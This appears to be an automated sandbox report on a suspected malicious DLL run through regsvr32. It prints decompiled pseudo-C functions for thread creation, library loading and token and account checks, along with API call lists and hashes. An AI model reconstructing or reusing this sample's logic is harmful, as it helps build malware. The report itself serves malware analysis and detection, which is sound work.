
                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049964EF Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                                                              			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x49af818; // 0x4bdf8b0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E04998BC9();
				E04999591();
				 *0x49af830 = _a4;
				E049A3CD5(_a4);
				 *_t49 = 0xf43;
				 *0x49af818 = E0499F05C(0x49aca50, 0x138);
				 *_t49 = 0x111;
				_t23 = E04999DF2(0x49aca50);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E04998BAF();
					 *_t49 = 0x40e;
					_t28 = E04999CB5(E0499109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x49af828 = E0499F05C(0x49acbb8, _t48);
						E04996370(_t48, __eflags);
						E04998BF4( &_a8, 0xfffffffe);
						_t36 =  *0x49af818; // 0x4bdf8b0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E04996298, 0, 0,  &_v8);
					 *0x49af83c = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E04998BAF();
				goto L3;
			}













                                                                                                                                                                                              0x049964f2
                                                                                                                                                                                              0x049964f7
                                                                                                                                                                                              0x049965db
                                                                                                                                                                                              0x049965df
                                                                                                                                                                                              0x049965d4
                                                                                                                                                                                              0x049965d6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049965d6
                                                                                                                                                                                              0x049965e1
                                                                                                                                                                                              0x049965eb
                                                                                                                                                                                              0x04996556
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04996556
                                                                                                                                                                                              0x049964fd
                                                                                                                                                                                              0x04996502
                                                                                                                                                                                              0x0499650b
                                                                                                                                                                                              0x04996510
                                                                                                                                                                                              0x0499651a
                                                                                                                                                                                              0x0499652b
                                                                                                                                                                                              0x04996530
                                                                                                                                                                                              0x04996537
                                                                                                                                                                                              0x0499653c
                                                                                                                                                                                              0x0499653e
                                                                                                                                                                                              0x04996541
                                                                                                                                                                                              0x0499654d
                                                                                                                                                                                              0x0499654e
                                                                                                                                                                                              0x0499655a
                                                                                                                                                                                              0x0499655f
                                                                                                                                                                                              0x0499656e
                                                                                                                                                                                              0x04996573
                                                                                                                                                                                              0x04996576
                                                                                                                                                                                              0x04996578
                                                                                                                                                                                              0x04996581
                                                                                                                                                                                              0x0499658c
                                                                                                                                                                                              0x04996591
                                                                                                                                                                                              0x0499659c
                                                                                                                                                                                              0x049965a1
                                                                                                                                                                                              0x049965ab
                                                                                                                                                                                              0x049965ab
                                                                                                                                                                                              0x049965c5
                                                                                                                                                                                              0x049965c8
                                                                                                                                                                                              0x049965cb
                                                                                                                                                                                              0x049965d0
                                                                                                                                                                                              0x049965d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049965d2
                                                                                                                                                                                              0x04996550
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04998BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,04996502), ref: 04998BD2
                                                                                                                                                                                                • Part of subcall function 0499F05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,049ACA50,?,0499652B,?), ref: 0499F07E
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 04996541
                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,04996298,00000000,00000000,?), ref: 049965C8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 607385197-0
                                                                                                                                                                                              • Opcode ID: 132ca43a1502db9f7ab1ea66d722136b781f7418942772f129368c3d28c7ad1d
                                                                                                                                                                                              • Instruction ID: 0466ac5271b5dcc43261b4f80318f180c2348766ade0033e3177142a9256f013
                                                                                                                                                                                              • Opcode Fuzzy Hash: 132ca43a1502db9f7ab1ea66d722136b781f7418942772f129368c3d28c7ad1d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A2171B1A14204AFEF44BF7CD805A593BE8EF45314F008539E51ACA284DB78FD40CBA6
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499F05C Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 307 499f05c-499f07c call 4999dd8 310 499f07e-499f084 GetModuleHandleA 307->310 311 499f086-499f08b LoadLibraryA 307->311 312 499f08d-499f08f 310->312 311->312 313 499f09e-499f0ac call 4998b9c 312->313 314 499f091-499f096 call 499f011 312->314 317 499f09b-499f09c 314->317 317->313
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E0499F05C(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E04999DD8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf43) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0499F011(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E04998B9C( &_v8);
				return _t25;
			}










                                                                                                                                                                                              0x0499f05f
                                                                                                                                                                                              0x0499f062
                                                                                                                                                                                              0x0499f068
                                                                                                                                                                                              0x0499f06a
                                                                                                                                                                                              0x0499f06f
                                                                                                                                                                                              0x0499f071
                                                                                                                                                                                              0x0499f07b
                                                                                                                                                                                              0x0499f07c
                                                                                                                                                                                              0x0499f08b
                                                                                                                                                                                              0x0499f07e
                                                                                                                                                                                              0x0499f07e
                                                                                                                                                                                              0x0499f07e
                                                                                                                                                                                              0x0499f08f
                                                                                                                                                                                              0x0499f096
                                                                                                                                                                                              0x0499f09c
                                                                                                                                                                                              0x0499f09c
                                                                                                                                                                                              0x0499f0a1
                                                                                                                                                                                              0x0499f0ac

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,?,?,049ACA50,?,0499652B,?), ref: 0499F07E
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000,?,?,?,049ACA50,?,0499652B,?), ref: 0499F08B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4133054770-0
                                                                                                                                                                                              • Opcode ID: 68a0700e9e18b46d0d148149d2f4d9e9a5784cc6d573bb9547bfa9d9a7d769be
                                                                                                                                                                                              • Instruction ID: 76834f4003dd4e80c1eb65b612b80024fb1bb6dc49f111030f140cd97655d84b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 68a0700e9e18b46d0d148149d2f4d9e9a5784cc6d573bb9547bfa9d9a7d769be
                                                                                                                                                                                              • Instruction Fuzzy Hash: 15F0AE717041147BEB14AB6DE84446AF7EDDF843557144439F606D3154EA70AE4086D0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499C8C9 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 319 499c8c9-499c8e8 call 499c79e 322 499c8ee-499c905 call 499c7f5 319->322 323 499c983-499c986 319->323 326 499c965-499c973 FindCloseChangeNotification 322->326 327 499c907-499c928 322->327 328 499c981 326->328 329 499c975-499c980 call 4998bf4 326->329 327->326 333 499c92a-499c92c 327->333 328->323 329->328 334 499c958-499c963 333->334 335 499c92e-499c931 333->335 334->326 336 499c934-499c943 335->336 339 499c955-499c957 336->339 340 499c945-499c951 336->340 339->334 340->336 341 499c953 340->341 341->334
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E0499C8C9(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E0499C79E(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E0499C7F5(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E04998BF4( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x49af820; // 0x4bdfaa0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x49af820; // 0x4bdfaa0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x49af820; // 0x4bdfaa0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















                                                                                                                                                                                              0x0499c8d0
                                                                                                                                                                                              0x0499c8d2
                                                                                                                                                                                              0x0499c8d9
                                                                                                                                                                                              0x0499c8db
                                                                                                                                                                                              0x0499c8de
                                                                                                                                                                                              0x0499c8e3
                                                                                                                                                                                              0x0499c8e8
                                                                                                                                                                                              0x0499c8f2
                                                                                                                                                                                              0x0499c8f5
                                                                                                                                                                                              0x0499c8f8
                                                                                                                                                                                              0x0499c8fd
                                                                                                                                                                                              0x0499c8ff
                                                                                                                                                                                              0x0499c905
                                                                                                                                                                                              0x0499c965
                                                                                                                                                                                              0x0499c96d
                                                                                                                                                                                              0x0499c973
                                                                                                                                                                                              0x0499c97a
                                                                                                                                                                                              0x0499c980
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499c981
                                                                                                                                                                                              0x0499c90a
                                                                                                                                                                                              0x0499c90b
                                                                                                                                                                                              0x0499c90c
                                                                                                                                                                                              0x0499c90d
                                                                                                                                                                                              0x0499c90e
                                                                                                                                                                                              0x0499c90f
                                                                                                                                                                                              0x0499c910
                                                                                                                                                                                              0x0499c911
                                                                                                                                                                                              0x0499c916
                                                                                                                                                                                              0x0499c918
                                                                                                                                                                                              0x0499c91d
                                                                                                                                                                                              0x0499c91e
                                                                                                                                                                                              0x0499c928
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499c92c
                                                                                                                                                                                              0x0499c958
                                                                                                                                                                                              0x0499c958
                                                                                                                                                                                              0x0499c960
                                                                                                                                                                                              0x0499c963
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499c963
                                                                                                                                                                                              0x0499c92e
                                                                                                                                                                                              0x0499c92e
                                                                                                                                                                                              0x0499c931
                                                                                                                                                                                              0x0499c934
                                                                                                                                                                                              0x0499c934
                                                                                                                                                                                              0x0499c937
                                                                                                                                                                                              0x0499c939
                                                                                                                                                                                              0x0499c943
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499c948
                                                                                                                                                                                              0x0499c949
                                                                                                                                                                                              0x0499c94c
                                                                                                                                                                                              0x0499c951
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499c953
                                                                                                                                                                                              0x0499c957
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499c957
                                                                                                                                                                                              0x0499c986

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0499C79E: GetCurrentThread.KERNEL32 ref: 0499C7B1
                                                                                                                                                                                                • Part of subcall function 0499C79E: OpenThreadToken.ADVAPI32(00000000,?,?,0499C8E3,00000000,04990000), ref: 0499C7B8
                                                                                                                                                                                                • Part of subcall function 0499C79E: GetLastError.KERNEL32(?,?,0499C8E3,00000000,04990000), ref: 0499C7BF
                                                                                                                                                                                                • Part of subcall function 0499C79E: OpenProcessToken.ADVAPI32(00000000,?,?,0499C8E3,00000000,04990000), ref: 0499C7E4
                                                                                                                                                                                                • Part of subcall function 0499C7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04990000,00000000,00000000,?,0499C876,00000000,00000000,?,0499C89F), ref: 0499C810
                                                                                                                                                                                                • Part of subcall function 0499C7F5: GetLastError.KERNEL32(?,0499C876,00000000,00000000,?,0499C89F,00001644,?,0499DFCE), ref: 0499C817
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04990000), ref: 0499C96D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1806447117-0
                                                                                                                                                                                              • Opcode ID: fcb68a970774d72906d28f896bdb92a0f6335493482b3f10157696af3fbbb8a7
                                                                                                                                                                                              • Instruction ID: 13bfde2d350f8084b488636c3e0da9f51cc6ff18f2b469b458c0a9b24b0624b6
                                                                                                                                                                                              • Opcode Fuzzy Hash: fcb68a970774d72906d28f896bdb92a0f6335493482b3f10157696af3fbbb8a7
                                                                                                                                                                                              • Instruction Fuzzy Hash: AE211872A04209AFDF10EFADDC85AAEBBF8EF48750B144479E511E7251E730AE018B90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04996298 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 342 4996298-49962b1 call 4996412 GetOEMCP call 499df3d 347 49962b3-49962b4 342->347 348 49962b6-49962e1 call 49a3bd5 342->348 349 499632b 347->349 352 49962eb-49962f1 call 499d804 348->352 353 49962e3-49962e9 348->353 356 49962f6-49962fd 352->356 354 4996305-4996311 353->354 357 4996323 call 49935a1 354->357 358 4996313-4996318 call 499611b 354->358 359 499631a-4996321 356->359 360 49962ff 356->360 364 4996328-499632a 357->364 358->364 359->357 359->364 360->354 364->349
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04996298(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				void* _t27;

				_t32 = __fp0;
				E04996412();
				GetOEMCP();
				_t13 = E0499DF3D(__fp0); // executed
				 *0x49af81c = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x49af81c; // 0x4bdfbe8
					_t2 = _t14 + 0x224; // 0x4990000
					E049A3BD5( *_t2);
					_t26 =  *0x49af81c; // 0x4bdfbe8
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t7 = _t26 + 0x224; // 0x4990000, executed
						_t26 =  *_t7;
						_t16 = E0499D804( *_t7); // executed
						__eflags = _t16;
						_t17 =  *0x49af81c; // 0x4bdfbe8
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E049935A1();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x49af81c; // 0x4bdfbe8
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E0499611B(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}











                                                                                                                                                                                              0x04996298
                                                                                                                                                                                              0x04996298
                                                                                                                                                                                              0x0499629d
                                                                                                                                                                                              0x049962a4
                                                                                                                                                                                              0x049962a9
                                                                                                                                                                                              0x049962b1
                                                                                                                                                                                              0x049962ba
                                                                                                                                                                                              0x049962c0
                                                                                                                                                                                              0x049962c5
                                                                                                                                                                                              0x049962cb
                                                                                                                                                                                              0x049962d0
                                                                                                                                                                                              0x049962d6
                                                                                                                                                                                              0x049962d7
                                                                                                                                                                                              0x049962e1
                                                                                                                                                                                              0x049962eb
                                                                                                                                                                                              0x049962eb
                                                                                                                                                                                              0x049962f1
                                                                                                                                                                                              0x049962f6
                                                                                                                                                                                              0x049962f8
                                                                                                                                                                                              0x049962fd
                                                                                                                                                                                              0x0499631a
                                                                                                                                                                                              0x04996321
                                                                                                                                                                                              0x04996328
                                                                                                                                                                                              0x04996328
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499632a
                                                                                                                                                                                              0x04996323
                                                                                                                                                                                              0x04996323
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04996323
                                                                                                                                                                                              0x049962ff
                                                                                                                                                                                              0x04996305
                                                                                                                                                                                              0x04996305
                                                                                                                                                                                              0x0499630a
                                                                                                                                                                                              0x04996311
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04996313
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04996313
                                                                                                                                                                                              0x049962e3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049962e3
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetOEMCP.KERNEL32 ref: 0499629D
                                                                                                                                                                                                • Part of subcall function 0499DF3D: GetCurrentProcessId.KERNEL32 ref: 0499DF64
                                                                                                                                                                                                • Part of subcall function 0499DF3D: LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 0499E057
                                                                                                                                                                                                • Part of subcall function 0499DF3D: GetLastError.KERNEL32 ref: 0499E05E
                                                                                                                                                                                                • Part of subcall function 0499DF3D: GetSystemMetrics.USER32(00001000), ref: 0499E06E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccountCurrentErrorLastLookupMetricsProcessSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 253334094-0
                                                                                                                                                                                              • Opcode ID: 62a3682606535851b4e90b3e4740efa236fd2671af3ed97d19510906a644e375
                                                                                                                                                                                              • Instruction ID: d868d97bfe452583ef88ab8eb883f513181cf466218e4de4b4f8f5585945166b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 62a3682606535851b4e90b3e4740efa236fd2671af3ed97d19510906a644e375
                                                                                                                                                                                              • Instruction Fuzzy Hash: F2018F31A08202CFDB14EF6CE549AE67BE4EF8A354F098276E445CB015C734AC92DBD2
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499C879 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 365 499c879-499c892 367 499c894-499c895 365->367 368 499c896-499c8a3 call 499c862 365->368 371 499c8b9-499c8c4 FindCloseChangeNotification 368->371 372 499c8a5-499c8a8 368->372 375 499c8c6-499c8c8 371->375 373 499c8aa-499c8af 372->373 374 499c8b5-499c8b7 372->374 373->374 374->375
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499C879(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x49af820; // 0x4bdfaa0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E0499C862(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x49af818; // 0x4bdf8b0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










                                                                                                                                                                                              0x0499c87d
                                                                                                                                                                                              0x0499c885
                                                                                                                                                                                              0x0499c88d
                                                                                                                                                                                              0x0499c892
                                                                                                                                                                                              0x0499c89a
                                                                                                                                                                                              0x0499c89f
                                                                                                                                                                                              0x0499c8a3
                                                                                                                                                                                              0x0499c8c1
                                                                                                                                                                                              0x0499c8c4
                                                                                                                                                                                              0x0499c8a5
                                                                                                                                                                                              0x0499c8a8
                                                                                                                                                                                              0x0499c8aa
                                                                                                                                                                                              0x0499c8b2
                                                                                                                                                                                              0x0499c8b2
                                                                                                                                                                                              0x0499c8b5
                                                                                                                                                                                              0x0499c8b5
                                                                                                                                                                                              0x0499c8c8
                                                                                                                                                                                              0x0499c895
                                                                                                                                                                                              0x0499c895
                                                                                                                                                                                              0x0499c895

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 355f60de7fe06b51f6e14d6584eeda361f80544dbd888356238cd226effb74f9
                                                                                                                                                                                              • Instruction ID: ff2a289b3b17ec94b0a4df45e31202b5767a6145a4025f1f08ccdb509fde293f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 355f60de7fe06b51f6e14d6584eeda361f80544dbd888356238cd226effb74f9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BF03A32A10104EBEF10DBAADD05A9D77F8FF08745F0545B4E502E7150EB34EE009B95
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499632E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499632E() {
				intOrPtr _t3;

				_t3 =  *0x49af818; // 0x4bdf8b0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x49af83c, 0xffffffff);
				ExitProcess(0);
			}




                                                                                                                                                                                              0x0499632e
                                                                                                                                                                                              0x0499633b
                                                                                                                                                                                              0x04996345

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 04996345
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                              • Opcode ID: 9ea4870d53c3f43a0c0381102da38513001ba58525b94b4d622da00a8c82795e
                                                                                                                                                                                              • Instruction ID: 5f63f6e31c01ba5b8b917226429925d018cc141ef243784cafa04fcc733fc07e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ea4870d53c3f43a0c0381102da38513001ba58525b94b4d622da00a8c82795e
                                                                                                                                                                                              • Instruction Fuzzy Hash: C5C002717180109FC7409B68E849F447BE0EF09322F1287B0F52ADA1E9CB2498659B86
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04998BDE Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04998BDE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x49af900, 8, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                              0x04998bec
                                                                                                                                                                                              0x04998bf3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,0499959D,00000100,?,04996507), ref: 04998BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              • Opcode ID: f19bbc46f2c8baf180d40bb2b88810f572c68e449fc7512b09d154949478b84f
                                                                                                                                                                                              • Instruction ID: 67afdf9e67cc04f43c614a4ed80b4478edf926070e1b83d4a15781a753767730
                                                                                                                                                                                              • Opcode Fuzzy Hash: f19bbc46f2c8baf180d40bb2b88810f572c68e449fc7512b09d154949478b84f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 61B0923248820CBBCB011A95EC05A843F29FB44795F004020F60D04060CB6668309BC0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499DA57 Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                              			E0499DA57(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




                                                                                                                                                                                              0x0499da5f
                                                                                                                                                                                              0x0499da67
                                                                                                                                                                                              0x0499da6c

